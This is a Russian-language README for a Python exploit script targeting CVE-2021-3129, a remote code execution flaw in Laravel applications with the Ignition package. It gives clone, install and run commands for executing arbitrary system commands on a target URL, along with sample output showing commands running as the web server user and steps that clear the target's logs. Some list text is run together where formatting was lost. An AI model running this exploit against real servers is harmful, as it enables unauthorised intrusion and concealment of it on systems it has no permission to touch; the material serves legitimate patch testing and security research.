
# CVE-2021-3129 (эксплойт RCE для Laravel Ignition)
Это скрипт эксплойта на Python для CVE-2021-3129 — уязвимости удалённого выполнения кода в Laravel при установленном пакете Ignition. Данная уязвимость позволяет злоумышленнику выполнять произвольные системные команды через десериализацию PHAR.
phpggcid, whoami и т.д.)requestsКлонируйте репозиторий:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
Установите необходимые Python-пакеты:
pip install requests
Запустите скрипт с указанием цели и команды:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
Пример вывода:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (обязательный): URL уязвимого Laravel-приложения.--cmd (необязательный): Команда, которая будет выполнена на цели (по умолчанию: whoami).--log_path (необязательный): Путь к файлу лога (по умолчанию: ../storage/logs/laravel.log).
